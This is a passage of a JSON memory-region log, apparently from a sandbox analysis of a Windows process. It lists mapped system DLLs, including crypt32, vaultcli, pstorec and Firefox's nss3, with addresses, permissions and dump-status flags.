"entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1921", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:01:25.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1922", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:01:25.569", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1923", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:25.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147303424, "type": "region", "version": 1 }, "end_va": 2147307519, "entry_point": 0, "filename": null, "id": "region_1924", "name": "private_0x000000007ffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147303424, "timestamp": "00:01:25.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1925", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:25.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1926", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:25.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 684031, "entry_point": 262144, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1927", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:25.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1540095, "entry_point": 0, "filename": null, "id": "region_1928", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:25.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4128767, "entry_point": 0, "filename": null, "id": "region_1929", "name": "private_0x00000000003e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4063232, "timestamp": "00:01:25.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 6750207, "entry_point": 0, "filename": null, "id": "region_1930", "name": "private_0x0000000000570000", "norm_filename": null, "region_type": "private_memory", "start_va": 5701632, "timestamp": "00:01:25.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1931", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:01:25.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1955856384, "type": "region", "version": 1 }, "end_va": 1955893247, "entry_point": 1955861024, "filename": "\\Windows\\System32\\version.dll", "id": "region_1932", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1955856384, "timestamp": "00:01:25.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1933", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:01:25.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1934", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:01:25.641", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1935", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:25.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1936", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:01:25.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1937", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:01:25.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1938", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:01:25.644", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1939", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:01:25.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1940", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:01:25.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1986461696, "type": "region", "version": 1 }, "end_va": 1986965503, "entry_point": 1986468590, "filename": "\\Windows\\System32\\comdlg32.dll", "id": "region_1941", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\system32\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1986461696, "timestamp": "00:01:25.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1942", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:25.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1943", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:01:25.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1944", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:01:25.647", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1945", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:01:25.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1946", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:25.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1947", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:01:25.649", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_1948", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:01:25.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1949", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:01:25.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1950", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:01:25.651", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1951", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:01:25.651", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1952", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:01:25.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1953", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:25.652", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1954", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:01:25.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1955", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:01:25.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_1959", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:01:25.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_1960", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:25.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3739647, "entry_point": 0, "filename": null, "id": "region_1961", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:01:25.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_1962", "name": "private_0x0000000000520000", "norm_filename": null, "region_type": "private_memory", "start_va": 5373952, "timestamp": "00:01:25.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 12976128, "type": "region", "version": 1 }, "end_va": 25559039, "entry_point": 0, "filename": null, "id": "region_1963", "name": "pagefile_0x0000000000c60000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 12976128, "timestamp": "00:01:25.676", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 7798783, "entry_point": 0, "filename": null, "id": "region_1966", "name": "private_0x0000000000670000", "norm_filename": null, "region_type": "private_memory", "start_va": 6750208, "timestamp": "00:01:25.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3801088, "type": "region", "version": 1 }, "end_va": 3805183, "entry_point": 0, "filename": null, "id": "region_1967", "name": "pagefile_0x00000000003a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3801088, "timestamp": "00:01:25.707", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 7798784, "type": "region", "version": 1 }, "end_va": 10743807, "entry_point": 7798784, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1970", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 7798784, "timestamp": "00:01:25.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1975", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:01:25.996", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 245760, "start_va": 4587520, "type": "region", "version": 1 }, "end_va": 4833279, "entry_point": 4592269, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1976", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 4587520, "timestamp": "00:01:25.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1958871040, "type": "region", "version": 1 }, "end_va": 1959112703, "entry_point": 1958875789, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1981", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1958871040, "timestamp": "00:01:26.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1982", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:01:26.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 10878976, "type": "region", "version": 1 }, "end_va": 11927551, "entry_point": 0, "filename": null, "id": "region_1985", "name": "private_0x0000000000a60000", "norm_filename": null, "region_type": "private_memory", "start_va": 10878976, "timestamp": "00:01:26.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1911291904, "type": "region", "version": 1 }, "end_va": 1911345151, "entry_point": 1911315229, "filename": "\\Windows\\System32\\pstorec.dll", "id": "region_1986", "name": "pstorec.dll", "norm_filename": "c:\\windows\\system32\\pstorec.dll", "region_type": "memory_mapped_file", "start_va": 1911291904, "timestamp": "00:01:26.080", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1987", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:01:26.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 1947992064, "type": "region", "version": 1 }, "end_va": 1948073983, "entry_point": 1947999657, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1988", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 1947992064, "timestamp": "00:01:26.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1867317248, "type": "region", "version": 1 }, "end_va": 1867366399, "entry_point": 1867317248, "filename": "\\Windows\\System32\\vaultcli.dll", "id": "region_1989", "name": "vaultcli.dll", "norm_filename": "c:\\windows\\system32\\vaultcli.dll", "region_type": "memory_mapped_file", "start_va": 1867317248, "timestamp": "00:01:26.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1052672, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 26611711, "entry_point": 0, "filename": null, "id": "region_2089", "name": "private_0x0000000001860000", "norm_filename": null, "region_type": "private_memory", "start_va": 25559040, "timestamp": "00:01:26.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1777664, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 27336703, "entry_point": 25559040, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_2093", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 25559040, "timestamp": "00:01:26.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1777664, "start_va": 25559040, "type": "region", "version": 1 }, "end_va": 27336703, "entry_point": 27011107, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_2094", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 25559040, "timestamp": "00:01:26.799", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1789952, "start_va": 1663500288, "type": "region", "version": 1 }, "end_va": 1665290239, "entry_point": 1664952355, "filename": "\\Program Files\\Mozilla Firefox\\nss3.dll", "id": "region_2095", "name": "nss3.dll", "norm_filename": "c:\\program files\\mozilla firefox\\nss3.dll", "region_type": "memory_mapped_file", "start_va": 1663500288, "timestamp": "00:01:26.821", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 204800, "start_va": 1851916288, "type": "region", "version": 1 }, "end_va": 1852121087, "entry_point": 1851930609, "filename": "\\Windows\\System32\\winmm.dll", "id": "region_2097", "name": "winmm.dll", "norm_filename": "c:\\windows\\system32\\winmm.dll", "region_type": "memory_mapped_file", "start_va": 1851916288, "timestamp": "00:01:26.838", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1865482240, "type": "region", "version": 1 }, "end_va": 1865510911, "entry_point": 1865482240, "filename": "\\Windows\\System32\\wsock32.dll", "id": "region_2098", "name": "wsock32.dll", "norm_filename": "c:\\windows\\system32\\wsock32.dll", "region_type": "memory_mapped_file", "start_va": 1865482240, "timestamp": "00:01:26.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1989541888, "type": "region", "version": 1 }, "end_va": 1989758975, "entry_point": 1989547101, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_2099", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1989541888, "timestamp": "00:01:26.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_2100", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:01:26.873", "type": "region", "version": 1 